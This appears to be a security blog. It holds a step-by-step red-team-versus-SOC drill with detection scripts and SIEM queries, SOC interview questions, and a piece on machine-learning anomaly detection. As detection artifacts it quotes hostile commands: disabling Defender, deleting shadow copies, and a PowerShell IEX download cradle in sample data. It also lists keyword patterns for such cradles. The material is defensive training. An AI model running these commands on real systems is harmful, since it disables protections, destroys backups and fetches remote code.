
Sunday, September 7, 2025

Step-by-Step Red Team vs SOC interactive drill

 Format per step: Attacker Action → Your Move (respond) → Example SOC Play

1) Initial Access — Spearphishing Attachment (TA0001 • T1566.001)

Attacker action: Finance user opens Q3_Report.xlsm, enables macros. Macro drops a loader and reaches out to [C2_DOMAIN].

Artifacts to expect:

  • Mail gateway alert on macro doc; attachment hash [HASH].

  • Security 4688: EXCEL.EXE → powershell.exe.

  • PowerShell 4104/4103: suspicious download/IEX strings.

  • Sysmon 1/3: powershell.exe spawned + outbound to [C2_IP]:443.

Your move: What do you triage first, and what do you block/contain?

Example SOC play (peek after you reply):

  • Quarantine the email campaign; block [HASH], [C2_DOMAIN], [C2_IP].

  • Isolate endpoint [HOST-A].

  • Pull mailbox from Finance user + same campaign recipients.

  • Start timeline on [HOST-A] (proc tree around 4688/4104/Sysmon 1).

  • Create SIEM rule: EXCEL.EXE → powershell.exe with network.


2) Execution — PowerShell (TA0002 • T1059.001 / User Execution T1204.002)

Attacker action: Loader runs obfuscated PowerShell to stage an in-memory beacon.

Artifacts:

  • PS 4104: base64/obf content; AMSI hits (if enabled).

  • Sysmon 3: unusual connections from powershell.exe.

  • EDR: LOLBins + AMSI bypass attempts.

Your move: What queries do you run, what do you capture (memory/disk), and how do you verify in-memory execution?

Example SOC play:

  • Block PS with network if policy allows; kill offending process.

  • Memory capture of [HOST-A] (EDR live response) to confirm injected module.

  • SIEM hunt: Image=*\\powershell.exe AND (CommandLine=*FromBase64* OR *IEX* OR *DownloadString*).
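The step 1 SIEM rule (Office parent → powershell.exe with network) and the step 2 hunt (suspicious PowerShell command lines) can be prototyped against raw Sysmon telemetry before they go into the SIEM. The script below is an added example, not part of the original drill: it joins Sysmon Event ID 1 (process create) to Event ID 3 (network connect) on ProcessGuid and rates each powershell.exe launch. Field names follow Sysmon's own schema; the hosts, users, GUIDs, 203.0.113.x addresses and the base64 placeholder are constructed sample data.

```python
"""Correlate Sysmon Event ID 1 (process create) and Event ID 3 (network connection)
to surface the Office -> powershell.exe -> outbound chain from steps 1 and 2.
Added example, not part of the original drill; events below are constructed."""
from collections import defaultdict

# Office parents that should never spawn a shell on a Finance workstation
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Command-line substrings from the step 2 SIEM hunt, plus two common companions
SUSPICIOUS_CMDLINE = ("frombase64", "downloadstring", "iex", "-enc", "hidden")


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def correlate(events):
    """Return findings for powershell.exe launches that have an Office parent and/or
    a suspicious command line; each finding carries the outbound connections that
    Sysmon 3 recorded for the same ProcessGuid."""
    net_by_guid = defaultdict(list)
    for ev in events:
        if ev["EventID"] == 3:
            net_by_guid[ev["ProcessGuid"]].append((ev["DestinationIp"], ev["DestinationPort"]))

    findings = []
    for ev in events:
        if ev["EventID"] != 1 or basename(ev["Image"]) != "powershell.exe":
            continue
        office_parent = basename(ev["ParentImage"]) in OFFICE_PARENTS
        cmdline = ev.get("CommandLine", "").lower()
        hits = [s for s in SUSPICIOUS_CMDLINE if s in cmdline]
        if not office_parent and not hits:
            continue  # plain interactive PowerShell: not worth an alert
        dests = net_by_guid.get(ev["ProcessGuid"], [])
        # Office parent AND network egress is the step 1 rule: rate it high
        severity = "high" if office_parent and dests else "medium"
        findings.append({
            "host": ev["Computer"], "user": ev["User"], "guid": ev["ProcessGuid"],
            "parent": basename(ev["ParentImage"]), "indicators": hits,
            "destinations": dests, "severity": severity,
        })
    return findings


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
# Constructed sample telemetry (hosts, users, GUIDs and addresses are placeholders)
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "HOST-A", "User": "CORP\\fin.user", "ProcessGuid": "{G1}",
     "Image": PS, "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -enc [BASE64_BLOB]"},
    {"EventID": 3, "Computer": "HOST-A", "ProcessGuid": "{G1}",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventID": 1, "Computer": "HOST-B", "User": "CORP\\it.admin", "ProcessGuid": "{G2}",
     "Image": PS, "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe Get-ChildItem C:\\Logs"},   # benign, stays quiet
    {"EventID": 1, "Computer": "HOST-C", "User": "CORP\\hr.user", "ProcessGuid": "{G3}",
     "Image": PS, "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "powershell -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')\""},
]

if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print(f["severity"], f["host"], f["parent"], f["indicators"], f["destinations"])
```

The join on ProcessGuid is what separates "Finance opened a macro doc" from "Finance opened a macro doc and the child shell called out": only the first finding is rated high, the cmd.exe-spawned download cradle is medium because no egress was seen yet, and the admin's Get-ChildItem never surfaces.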


3) Persistence — Run Keys / Scheduled Task (TA0003 • T1547.001 / T1053.005)

Attacker action: Adds HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater → [path]\beacon.exe and/or creates schtasks /create /sc minute /tn Updater.

Artifacts:

  • Sysmon 13: Registry value set.

  • Security 4698: Scheduled task created.

  • Autoruns delta shows new entry.

 Your move: How do you enumerate + remove persistence safely?

Example SOC play:

  • Export autoruns/registry keys; remove entries post-snapshot.

  • Disable and delete suspicious scheduled tasks.

  • Add detection: alert on new Run keys + 4698 unknown task names.


4) Privilege Escalation — Exploit/Token Abuse (TA0004 • T1068 / T1134.001)

Attacker action: Attempts SYSTEM via vulnerable service/driver or token impersonation on [HOST-A].

Artifacts:

  • Security 4672: Special privileges.

  • Sysmon 1: low-priv → high-priv proc chain (e.g., cmd.exe as SYSTEM).

  • EDR exploit/tamper alerts.

 Your move: What indicators confirm elevation, and what containment/escalation do you perform?

Example SOC play:

  • Snapshot access tokens/process owners; block exploit tool hash.

  • Isolate host if not already; push hotfixes/EDR hardening policy.

  • Hunt for SeDebugPrivilege processes from non-system parents.


5) Defense Evasion — Disable Security Tools / Obfuscation (TA0005 • T1562.001 / T1027)

Attacker action: Tries Set-MpPreference -DisableRealtimeMonitoring $true and drops packed binaries.

Artifacts:

  • Microsoft Defender 5007 config change logs.

  • EDR tamper protection alerts.

  • New packed binaries with low reputation.

 Your move: What immediate protections do you re-enable and how do you harden?

Example SOC play:

  • Force re-enable AV/EDR, rotate tamper protection password (if applicable).

  • Block powershell.exe child procs for standard users temporarily.

  • Add SIEM alert: Defender setting changes + non-admin callers.


6) Credential Access — LSASS Dump (TA0006 • T1003.001)

Attacker action: Attempts to read LSASS memory from a tool on [HOST-A].

Artifacts:

  • Sysmon 10: lsass.exe access from non-system process.

  • EDR: Credential theft heuristic.

  • Security 4688: rundll32, procdump, suspicious signed binaries.

 Your move: What forensics do you grab, and how do you protect accounts?

Example SOC play:

  • Kill offending proc; block tool hashes/signers.

  • Reset passwords + revoke tokens for logged-on users on [HOST-A].

  • Detections: alert on Sysmon 10 to lsass.exe excluding known AV paths.


7) Discovery — AD & Network Recon (TA0007 • T1087/T1018/T1046)

Attacker action: Runs whoami /all, nltest /dclist, net group "Domain Admins" /domain, network scans.

Artifacts:

  • Security 4688: cmd.exe, net.exe, nltest.exe, dsquery.exe.

  • Lateral enumeration spikes in Windows event/network telemetry.

 Your move: How do you distinguish benign admin activity vs recon, and what do you scope?

Example SOC play:

  • Baseline admin tool usage; flag tool use from non-admin workstations.

  • Correlate enumeration → subsequent auth attempts to servers.

  • Suppress noise; raise on sequences (whoami → nltest → net group).
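Raising on the sequence rather than on each tool is what keeps this rule quiet on admin workstations. The script below is an added example, not part of the original drill: it classifies Security 4688 records into recon tool families, slides a window over each host/user pair, and fires only when several distinct tools appear in order inside that window, noting whether the host is on the admin-workstation baseline. The 4688-style records, the baseline, the 10-minute window and the three-tool threshold are constructed assumptions.

```python
"""Flag the step 7 recon sequence (whoami -> nltest -> net group ...) when several
distinct enumeration tools run under one host/user inside a short window.
Added example, not part of the original drill; records and baseline are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)             # assumed window; tune to your environment
MIN_DISTINCT_TOOLS = 3                     # assumed threshold
ADMIN_WORKSTATIONS = {"ADM-01", "ADM-02"}  # constructed baseline of sanctioned admin hosts


def recon_kind(new_process_name, command_line):
    """Classify a 4688 record into a recon tool family, or None if it is not recon."""
    exe = new_process_name.rsplit("\\", 1)[-1].lower()
    cmd = command_line.lower()
    if exe == "whoami.exe":
        return "whoami"
    if exe == "nltest.exe":
        return "nltest"
    if exe == "dsquery.exe":
        return "dsquery"
    if exe in ("net.exe", "net1.exe") and "/domain" in cmd:
        return "net group" if " group " in cmd else "net user"
    return None


def detect_recon_sequences(events):
    """One finding per (host, user) whose distinct recon tools inside WINDOW reach the threshold."""
    by_actor = defaultdict(list)
    for ev in events:
        kind = recon_kind(ev["NewProcessName"], ev.get("CommandLine", ""))
        if kind:
            by_actor[(ev["Computer"], ev["SubjectUserName"])].append(
                (datetime.fromisoformat(ev["TimeCreated"]), kind, ev["CommandLine"]))

    findings = []
    for (host, user), hits in by_actor.items():
        hits.sort()
        for i, (start, _, _) in enumerate(hits):
            in_window = [h for h in hits[i:] if h[0] - start <= WINDOW]
            tools = []
            for _, kind, _ in in_window:      # keep execution order, drop repeats
                if kind not in tools:
                    tools.append(kind)
            if len(tools) >= MIN_DISTINCT_TOOLS:
                findings.append({
                    "host": host, "user": user, "first_seen": start.isoformat(),
                    "sequence": tools, "commands": [c for _, _, c in in_window],
                    "admin_workstation": host in ADMIN_WORKSTATIONS,
                })
                break   # one finding per actor is enough for triage
    return findings


def rec(ts, host, user, exe, cmd):
    """Constructed 4688-style record."""
    return {"TimeCreated": ts, "Computer": host, "SubjectUserName": user,
            "NewProcessName": "C:\\Windows\\System32\\" + exe, "CommandLine": cmd}


SAMPLE_4688 = [
    # Finance workstation: three tools in three minutes -> fires
    rec("2025-09-07T09:00:10", "WS-FIN-07", "fin.user", "whoami.exe", "whoami /all"),
    rec("2025-09-07T09:01:02", "WS-FIN-07", "fin.user", "nltest.exe", "nltest /dclist:corp"),
    rec("2025-09-07T09:02:40", "WS-FIN-07", "fin.user", "net.exe", "net group \"Domain Admins\" /domain"),
    rec("2025-09-07T09:03:00", "WS-FIN-07", "fin.user", "cmd.exe", "cmd.exe"),
    # Admin workstation, only two tools: below threshold
    rec("2025-09-07T11:00:00", "ADM-01", "adm.smith", "whoami.exe", "whoami"),
    rec("2025-09-07T11:00:30", "ADM-01", "adm.smith", "nltest.exe", "nltest /dsgetdc:corp"),
    # Same three tools spread over hours: no single window reaches the threshold
    rec("2025-09-07T08:00:00", "WS-HR-02", "hr.user", "whoami.exe", "whoami"),
    rec("2025-09-07T10:30:00", "WS-HR-02", "hr.user", "nltest.exe", "nltest /dclist:corp"),
    rec("2025-09-07T13:00:00", "WS-HR-02", "hr.user", "net.exe", "net group \"Domain Admins\" /domain"),
]

if __name__ == "__main__":
    for f in detect_recon_sequences(SAMPLE_4688):
        print(f["host"], f["user"], f["sequence"], "admin host:", f["admin_workstation"])
```

Only WS-FIN-07 fires; the admin host stays under the threshold and the HR host's tools are too spread out. In production, feed the `admin_workstation` flag into severity rather than into suppression, so that recon from a sanctioned host is still visible at a lower priority.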


8) Lateral Movement — SMB Admin Shares / PsExec (TA0008 • T1021.002)

Attacker action: Uses stolen creds to push service over \\[TARGET]\ADMIN$, or PsExec to [SERVER-1].

Artifacts:

  • Security 4624 (Type 3) from [HOST-A] to [SERVER-1] with uncommon account.

  • Service creation 7045 / PsExec service artifacts.

  • Sysmon 3: SMB bursts; Sysmon 1: psexesvc.exe.

 Your move: What blocks do you place and how do you trace blast radius?

Example SOC play:

  • Disable account used; block host-to-host SMB temporarily where feasible.

  • Isolate [SERVER-1]; pull service creation/event logs.

  • Hunt for same creds against other servers (pivot map).
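The pivot map in the last bullet is a small graph problem: Security 4624 Type 3 events give you source (IpAddress) → target (Computer) edges per account, and walking those edges from [HOST-A] is the blast radius. The script below is an added example, not part of the original drill: the logon records, the host/IP inventory and the per-account baseline of normal targets are constructed.

```python
"""Build a pivot map from Security 4624 network logons (LogonType 3) to answer step 8:
which hosts did the stolen credential reach, and what is the blast radius from the
first compromised host. Added example, not part of the original drill."""
from collections import defaultdict

# Constructed inventory: target Computer name -> its IP, so a logon's IpAddress
# (the source) can be chained to later logons originating from that target.
HOST_IPS = {"HOST-A": "10.0.5.23", "SERVER-1": "10.0.10.5", "SERVER-2": "10.0.10.6",
            "FILE-01": "10.0.10.9", "WS-HR-02": "10.0.5.41", "PRINT-01": "10.0.10.30"}
IP_TO_HOST = {ip: h for h, ip in HOST_IPS.items()}

# Constructed baseline of where each account normally logs on over the network
BASELINE = {"svc_backup": {"FILE-01"}, "hr.user": {"PRINT-01"}}


def build_pivot_map(events):
    """Return (account -> targets, source host -> targets), network logons only."""
    by_account = defaultdict(set)
    by_source = defaultdict(set)
    for ev in events:
        if ev["EventID"] != 4624 or ev["LogonType"] != 3:
            continue
        src = IP_TO_HOST.get(ev["IpAddress"], ev["IpAddress"])
        by_account[ev["TargetUserName"]].add(ev["Computer"])
        by_source[src].add(ev["Computer"])
    return by_account, by_source


def blast_radius(by_source, start_host):
    """Hosts reachable from start_host by following logon edges (breadth-first)."""
    seen, queue = set(), [start_host]
    while queue:
        cur = queue.pop(0)
        for target in sorted(by_source.get(cur, ())):
            if target not in seen:
                seen.add(target)
                queue.append(target)
    return sorted(seen)


def new_targets(by_account, baseline):
    """Accounts that reached hosts outside their baseline, with the new hosts listed."""
    out = {}
    for acct, hosts in by_account.items():
        novel = hosts - baseline.get(acct, set())
        if novel:
            out[acct] = sorted(novel)
    return out


# Constructed 4624 records: svc_backup is the stolen credential hopping HOST-A -> SERVER-1 -> SERVER-2 -> FILE-01
SAMPLE_4624 = [
    {"EventID": 4624, "LogonType": 3, "Computer": "SERVER-1", "TargetUserName": "svc_backup", "IpAddress": "10.0.5.23"},
    {"EventID": 4624, "LogonType": 3, "Computer": "SERVER-2", "TargetUserName": "svc_backup", "IpAddress": "10.0.10.5"},
    {"EventID": 4624, "LogonType": 3, "Computer": "FILE-01", "TargetUserName": "svc_backup", "IpAddress": "10.0.10.6"},
    {"EventID": 4624, "LogonType": 3, "Computer": "PRINT-01", "TargetUserName": "hr.user", "IpAddress": "10.0.5.41"},
    {"EventID": 4624, "LogonType": 2, "Computer": "HOST-A", "TargetUserName": "fin.user", "IpAddress": "-"},  # console logon, ignored
]

if __name__ == "__main__":
    acct_map, src_map = build_pivot_map(SAMPLE_4624)
    print("blast radius from HOST-A:", blast_radius(src_map, "HOST-A"))
    print("accounts on new hosts:", new_targets(acct_map, BASELINE))
```

FILE-01 shows up in the blast radius even though it is a normal target for svc_backup: the account baseline tells you which logons are novel, the graph walk tells you what the attacker could now touch, and containment needs both lists.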


9) Command & Control — HTTPS Beacon (TA0011 • T1071.001)

Attacker action: Beacon over HTTPS with jitter/SNI to [C2_DOMAIN] (fronted).

Artifacts:

  • Proxy/TLS: unusual JA3/JA3S, rare SNI, short periodic beacons.

  • DNS: rare domain, high NXDOMAIN siblings, newly registered domain.

  • EDR: long-lived process with periodic network.

 Your move: How do you detect/contain C2 without burning all evidence?

Example SOC play:

  • Block destination at DNS/Proxy; sinkhole if available.

  • Capture PCAP before/after block; tag affected assets.

  • Retro hunt: same SNI/JA3 across fleet; add rare-domain model.
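Jitter makes a beacon's interval vary, but it stays clustered around a median far more tightly than a user's browsing to the same destination. The script below is an added example, not part of the original drill: it groups connection records by (host, destination), measures the median inter-arrival interval and its median absolute deviation, and flags pairs whose spread is small relative to the median. The connection records, the 203.0.113.x/198.51.100.x addresses standing in for [C2_DOMAIN] and ordinary sites, and the thresholds are constructed assumptions.

```python
"""Score (host, destination) pairs for beacon-like periodicity in proxy or Sysmon 3 logs:
many connections whose inter-arrival times cluster tightly around a median.
Added example, not part of the original drill; records and thresholds are constructed."""
from collections import defaultdict
from statistics import median

MIN_CONNECTIONS = 8                   # assumed: enough samples to judge periodicity
MAX_JITTER_RATIO = 0.3                # assumed: MAD / median interval; jittered beacons stay well below
MIN_INTERVAL, MAX_INTERVAL = 5, 3600  # assumed, seconds: skip sub-second chatter and daily jobs


def interval_stats(timestamps):
    """Median inter-arrival interval and its median absolute deviation (robust to outliers)."""
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    med = median(gaps)
    mad = median(abs(g - med) for g in gaps)
    return med, mad


def detect_beacons(connections):
    """connections: iterable of (epoch_seconds, host, destination). Returns beacon findings."""
    by_pair = defaultdict(list)
    for t, host, dst in connections:
        by_pair[(host, dst)].append(t)
    findings = []
    for (host, dst), ts in by_pair.items():
        if len(ts) < MIN_CONNECTIONS:
            continue
        med, mad = interval_stats(ts)
        if not (MIN_INTERVAL <= med <= MAX_INTERVAL):
            continue
        jitter = mad / med
        if jitter <= MAX_JITTER_RATIO:
            findings.append({"host": host, "destination": dst, "count": len(ts),
                             "median_interval_s": med, "jitter_ratio": round(jitter, 3)})
    return findings


def make_connections(host, dst, start, gaps):
    """Constructed helper: turn inter-arrival gaps (seconds) into connection records."""
    out, t = [(start, host, dst)], start
    for g in gaps:
        t += g
        out.append((t, host, dst))
    return out


# Constructed samples: a 60 s beacon with ~10% jitter, bursty browsing, and a pair with too few samples
SAMPLE_CONNECTIONS = (
    make_connections("HOST-A", "203.0.113.10:443", 1_757_200_000, [60, 54, 66, 58, 63, 61, 57, 65, 60, 62])
    + make_connections("HOST-A", "198.51.100.20:443", 1_757_200_000, [2, 40, 300, 1, 5, 900, 12, 3, 77, 20])
    + make_connections("HOST-B", "198.51.100.77:443", 1_757_200_000, [30, 30])
)

if __name__ == "__main__":
    for f in detect_beacons(SAMPLE_CONNECTIONS):
        print(f)
```

The beacon pair scores a jitter ratio near 0.04 and is reported; the browsing pair's ratio is close to 1 and HOST-B never reaches the sample minimum. Run this over the full proxy log as the retro hunt, then pivot the flagged destinations into the SNI/JA3 search from the play.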


10) Collection & Exfiltration — Archive & Upload (TA0009/TA0010 • T1560.001 / T1567.002)

Attacker action: Stages 7z a C:\Users\[USER]\AppData\Local\Temp\docs.7z → uploads to C2/cloud.

Artifacts:

  • Security 4688: 7z.exe / tar.exe create archive in temp paths.

  • DLP/proxy: large POST/PUT to rare external host.

  • File creation spikes of .zip/.7z in user profile.

 Your move: What do you block and how do you prove what left?

Example SOC play:

  • Block outbound to [C2_DOMAIN] and cloud storage destination.

  • Grab proxy/DLP logs; compare bytes sent vs staged archive size.

  • Contain user account; collect the staging dir for evidence.


11) Impact — Ransomware Prep/Execution (TA0040 • T1486)

Attacker action: Drops encryptor; shadow copy deletion; mass file writes.

Artifacts:

  • vssadmin delete shadows /all /quiet (4688).

  • EDR: high file rename/write rate; ransom note creation per directory.

  • SMB: unusual write storms to file shares.

 Your move: What pre-encryption controls and last-mile containment do you apply?

Example SOC play:

  • Preemptive: block vssadmin/wbadmin abuse; enable canary files & rate-limit share writes.

  • Immediate: isolate infected machines; disable affected AD accounts.

  • Restore from offline backups; forensics on initial vector; exec briefing.


Quick-use Detection Snippets (adapt to your SIEM)

  • Splunk – PS suspicious:

    index=win* ((EventCode=4688 New_Process_Name="*\\powershell.exe" (CommandLine="*IEX*" OR CommandLine="*FromBase64*"))
                OR (EventCode=4104 (ScriptBlockText="*FromBase64*" OR ScriptBlockText="*IEX*")))
    | eval content=coalesce(CommandLine, ScriptBlockText)
    | stats count by host, user, content
    
  • Elastic – LSASS access (Sysmon 10):

    event.code:10 and winlog.event_data.TargetImage:"C:\\Windows\\System32\\lsass.exe" and not process.executable:("C:\\Program Files\\Windows Defender\\*" or "C:\\Program Files\\*.exe")
    
  • Windows service creation:

    index=win* (EventCode=7045 OR EventCode=4697)
    | stats count by Service_Name, Service_File_Name, ComputerName
    

SOC Interview Questions

1. What is a SOC (Security Operations Center)?

 A centralized team and facility that monitors, detects, analyzes, and responds to cybersecurity incidents in real time.


2. What are the primary responsibilities of a SOC?

  • Continuous monitoring of network and systems

  • Incident detection, triage, and response

  • Threat intelligence analysis

  • Log management & SIEM tuning

  • Vulnerability assessment coordination

  • Incident reporting and documentation


3. What is the difference between Tier 1, Tier 2, and Tier 3 SOC analysts?

  • Tier 1 (Monitoring/Alert Handling): Monitor SIEM alerts, escalate suspicious activity.

  • Tier 2 (Incident Response): Investigate escalations, analyze logs, confirm incidents, contain threats.

  • Tier 3 (Threat Hunting/Forensics): Deep investigation, malware analysis, proactive threat hunting.


4. What is SIEM and why is it important in SOC?

 SIEM (Security Information & Event Management) collects, correlates, and analyzes logs from different sources to detect threats and generate alerts.
Examples: Splunk, QRadar, Elastic SIEM, ArcSight.


5. What is the difference between an Event, Alert, and Incident?

  • Event → Any log or activity observed in the system.

  • Alert → Notification generated when an event matches suspicious patterns.

  • Incident → A confirmed security event that violates policy or indicates compromise.


6. How do you handle a false positive in SOC?

 Verify against threat intelligence, logs, and baselines. If confirmed false, tune SIEM rules/signatures to reduce noise.


7. What are Indicators of Compromise (IOCs) and Indicators of Attack (IOAs)?

  • IOCs → Evidence of compromise (malicious IPs, hashes, domains).

  • IOAs → Behavioral indicators showing intent of an attack (privilege escalation attempts, abnormal lateral movement).


8. What are the common log sources in a SOC?

  • Firewalls

  • IDS/IPS

  • Antivirus/EDR

  • Proxy/Web servers

  • Authentication systems (Active Directory)

  • Cloud services logs (AWS CloudTrail, Azure Security logs)


9. What is Threat Hunting and how is it different from Incident Response?

  • Threat Hunting → Proactive search for hidden threats before alerts trigger.

  • Incident Response → Reactive steps taken after an incident is detected.


10. What is a Playbook in SOC?

 A documented set of steps (manual or automated) to respond to specific incidents like phishing, malware infection, or brute-force attacks.


11. What are common SOC tools?

  • SIEM → Splunk, QRadar, Elastic SIEM

  • EDR/XDR → CrowdStrike, SentinelOne, Microsoft Defender

  • SOAR → Cortex XSOAR, Splunk Phantom

  • Threat Intel → MISP, Recorded Future

  • Packet Analysis → Wireshark, Zeek


12. How would you respond to a suspected phishing email reported by a user?

 Steps:

  1. Instruct user not to click/open.

  2. Analyze email headers, URLs, and attachments.

  3. Search if other users received similar emails.

  4. Quarantine email in mail server.

  5. Block malicious domains/IPs.

  6. Update detection rules & train users.


13. How do you detect lateral movement in a network?

 Look for:

  • Unusual authentication attempts

  • Multiple login failures

  • Access to uncommon servers

  • Use of tools like PsExec, RDP, SMB connections


14. What is the MITRE ATT&CK framework and why is it useful in SOC?

 MITRE ATT&CK is a knowledge base of adversary tactics, techniques, and procedures (TTPs). SOC uses it to map detections, analyze threats, and build defenses.


15. What metrics/KPIs are important for SOC performance?

  • MTTD (Mean Time to Detect)

  • MTTR (Mean Time to Respond)

  • % of false positives

  • Number of incidents detected & resolved

  • Incident severity trends


Quick Tip for Interviews:
When answering scenario questions, always use the Incident Response Lifecycle:

  1. Identify

  2. Contain

  3. Eradicate

  4. Recover

  5. Lessons Learned


1. What is a Security Operations Center (SOC)?

A Security Operations Center (SOC) is a centralized unit within an organization that is responsible for continuously monitoring, detecting, analyzing, and responding to cybersecurity threats and incidents. Its main goal is to protect the organization's information assets from cyberattacks.

2. What is the role of a SOC Analyst?

A SOC Analyst's primary role is to act as the first line of defense. They are responsible for:

  • Monitoring security systems and tools (like SIEMs, IDS/IPS).

  • Analyzing security alerts to differentiate between real threats and false positives.

  • Investigating potential security incidents.

  • Following established incident response procedures.

  • Creating and maintaining documentation for security incidents.

3. Explain the difference between a threat, a vulnerability, and a risk.

  • A threat is a potential cause of an incident that could harm an organization's systems or data. It's the "who" or "what" that could cause damage (e.g., a hacker, malware, or a natural disaster).

  • A vulnerability is a weakness in a system or an asset that a threat can exploit. It's the "how" an attack can happen (e.g., an unpatched software, a weak password, or a misconfigured firewall).

  • A risk is the potential for loss or damage when a threat exploits a vulnerability. It's the impact of the attack, usually measured in terms of likelihood and potential business impact. Risk = Threat x Vulnerability.

Technical and Tool-Based Questions

4. What is a SIEM and why is it important in a SOC?

SIEM stands for Security Information and Event Management. It is a security tool that centralizes and aggregates security data from various sources (like firewalls, servers, and endpoint devices). A SIEM is crucial because it helps SOC analysts by:

  • Providing a single pane of glass for monitoring.

  • Correlating log data to identify patterns that might indicate an attack.

  • Generating alerts for suspicious activity, which analysts can then investigate.

5. What is the difference between an IDS and an IPS?

  • IDS (Intrusion Detection System): A passive system that monitors network traffic for malicious activity and policy violations. When it finds something suspicious, it generates an alert. It does not block the traffic.

  • IPS (Intrusion Prevention System): An active, inline system that not only detects malicious activity but also takes action to block or prevent the attack in real-time.

6. How do you handle a false positive?

A false positive is a security alert generated by a tool for activity that is actually benign. My process would be:

  1. Analyze the Alert: Review the alert details to understand what triggered it (e.g., source IP, destination port, protocol).

  2. Verify the Activity: Use other tools (like log aggregators, network traffic analyzers, or endpoint protection) to confirm if the activity is legitimate.

  3. Document and Tune: If confirmed as a false positive, I would document the finding, explain why it was a false positive, and then work with the SIEM/tool administrator to tune the rules or add an exception to prevent it from triggering again.

Incident Response and Scenario Questions

7. Walk me through your process for investigating a phishing alert.

  1. Initial Triage: I would immediately review the alert details, including the sender's email address, subject line, and any attached files or links.

  2. User Contact: I would contact the user who reported the email to get more context and ensure they didn't click on any links or download attachments.

  3. Threat Analysis: I would analyze the email headers to check the sender's authenticity and trace its origin. I would then check the links and attachments in a secure sandboxed environment to see what they do.

  4. IOC Search: I would extract any Indicators of Compromise (IOCs), such as malicious URLs, file hashes, or IP addresses, and search our SIEM and endpoint logs for any other users who may have received or interacted with the same email.

  5. Containment and Eradication: If any user clicked the link or downloaded a file, I would work with the IT team to isolate the affected machine and remove the threat.

  6. Reporting: Finally, I would create an incident report detailing the findings, the steps taken, and recommendations to prevent a similar incident in the future.

8. What is an IOC (Indicator of Compromise)?

An IOC is a piece of forensic data, such as a log entry or a file hash, that identifies malicious activity on a system or network. It's essentially the "digital breadcrumbs" left behind by an attacker. Common examples include:

  • Malicious IP addresses or domains.

  • File hashes (MD5, SHA-256).

  • Unusual outbound network traffic.

  • Specific email subject lines or sender addresses.

9. What steps would you take if a critical server is reported as compromised?

This is a high-priority incident requiring a structured response:

  1. Verify and Validate: I would first confirm that the alert is legitimate and that the server is indeed compromised, using real-time monitoring and log analysis.

  2. Containment: The most critical step is to isolate the compromised server from the rest of the network to prevent the attack from spreading. This might involve unplugging the network cable or blocking its access via a firewall.

  3. Investigation and Eradication: Once contained, I would begin a detailed forensic investigation to understand how the compromise occurred. I would then work to remove the threat, such as wiping the system and restoring from a known clean backup.

  4. Recovery: I would restore the server and services to their operational state, ensuring that the vulnerability that led to the compromise is patched.

  5. Reporting: I would document the entire incident from start to finish for future reference and for a post-mortem analysis.

Saturday, September 6, 2025

How is machine learning used in Network Anomaly Detection?



What is Network Anomaly Detection?

It means spotting unusual or suspicious behavior in network traffic (like hackers, malware, or system failures) compared to what’s normally expected.

Example: If your network usually sees 100 logins per day, and suddenly there are 1,000 failed logins at midnight, that's an anomaly.


How Machine Learning Helps

Machine learning models are trained on network data (like traffic logs, packet details, user behavior) to learn what “normal” looks like. Then they can detect when something unusual happens.


 1. Supervised Learning (learns from labeled data)

  • Training data: “Normal” vs. “Attack” traffic labeled by experts.

  • Model learns patterns of each.

  • Example: Detecting DDoS attacks, port scans, or phishing traffic.

 Real-world: IDS/IPS systems (like Snort + ML add-ons).


 2. Unsupervised Learning (no labels, finds patterns)

  • Model learns what normal traffic looks like.

  • Anything that doesn’t fit → flagged as anomaly.

  • Example: Detecting unusual spikes in bandwidth, unknown protocols, or new malware behavior.

 Real-world: Detecting zero-day attacks (new threats not seen before).


 3. Reinforcement Learning (trial & error with feedback)

  • System gets feedback on whether alerts are correct.

  • Over time, it improves decisions (reduces false positives).

  • Example: Adaptive firewalls that learn which traffic to block or allow.

 Real-world: Self-learning network security tools (like AI-driven intrusion prevention).


 Examples of Anomalies ML Detects

  • Unusual login patterns (multiple failed logins = brute-force attack).

  • Data exfiltration (sudden large file transfers outside network).

  • Malware traffic (strange connections to rare IPs).

  • Lateral movement (user account accessing servers it never used before).


In short:
Machine learning helps network anomaly detection by:

  1. Learning what normal traffic looks like.

  2. Spotting unusual patterns that may indicate threats.

  3. Reducing false alarms by continuously adapting.



Machine learning is a powerful tool for network anomaly detection because it can learn the normal patterns of network traffic and then flag any activity that deviates from that baseline as a potential threat. Instead of relying on predefined rules that can quickly become outdated, machine learning models can adapt to evolving network behaviors and identify new, unknown threats.


How It Works: The General Process

The process of using machine learning for network anomaly detection generally follows these steps:

  1. Data Collection: The first step is to gather vast amounts of data from the network. This includes things like log files, firewall data, packet information (headers and payload), and data on network flow.

  2. Feature Extraction: Raw network data is too complex for a machine learning model to use directly. So, useful features are extracted from the data. These features could include things like IP addresses, port numbers, the frequency of connections, and the size of data packets.

  3. Training the Model: The machine learning model is then trained on this data. It learns what "normal" network activity looks like. The specific approach depends on the type of machine learning used:

    • Supervised Learning: In this approach, the model is trained on a dataset that is labeled with examples of both "normal" and "anomalous" traffic. This is highly effective but requires a lot of labeled data, which can be hard to come by.

    • Unsupervised Learning: This is the more common approach. The model is given a large amount of unlabeled network data and learns the patterns of normal behavior on its own. It then flags any data points that don't fit into these normal patterns.

    • Reinforcement Learning: This is a newer approach where the model is treated as an "agent" that is rewarded for correctly identifying threats and penalized for making mistakes. It learns and improves over time through trial and error.

  4. Anomaly Detection: Once the model is trained, it can be deployed to monitor the network in real-time. When new network traffic comes in, the model analyzes it and assigns it an "anomaly score." If the score is above a certain threshold, it is flagged as a potential threat and an alert is sent to a security analyst.
